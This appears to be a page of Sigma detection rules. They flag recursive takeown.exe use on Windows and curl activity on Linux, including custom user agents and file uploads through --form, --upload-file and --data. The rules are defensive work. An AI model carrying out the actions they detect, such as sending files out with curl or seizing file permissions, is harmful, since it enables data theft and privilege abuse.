Techniques
Sample rules
Suspicious Recursive Takeown
- source: sigma
- technicques:
- t1222
- t1222.001
Description
Adversaries can interact with the DACLs using built-in Windows commands takeown which can grant adversaries higher permissions on specific files and folders
Detection logic
condition: selection
selection:
CommandLine|contains|all:
- '/f '
- /r
Image|endswith: \takeown.exe
Curl Usage on Linux
- source: sigma
- technicques:
- t1105
Description
Detects a curl process start on linux, which indicates a file download from a remote location or a simple web request to a remote server
Detection logic
condition: selection
selection:
Image|endswith: /curl
Suspicious Curl Change User Agents - Linux
- source: sigma
- technicques:
- t1071
- t1071.001
Description
Detects a suspicious curl process start on linux with set useragent options
Detection logic
condition: selection
selection:
CommandLine|contains:
- ' -A '
- ' --user-agent '
Image|endswith: /curl
Suspicious Curl File Upload - Linux
- source: sigma
- technicques:
- t1105
- t1567
Description
Detects a suspicious curl process start the adds a file to a web request
Detection logic
condition: all of selection_* and not 1 of filter_optional_*
filter_optional_localhost:
CommandLine|contains:
- ://localhost
- ://127.0.0.1
selection_cli:
- CommandLine|contains:
- ' --form'
- ' --upload-file '
- ' --data '
- ' --data-'
- CommandLine|re: \s-[FTd]\s
selection_img:
Image|endswith: /curl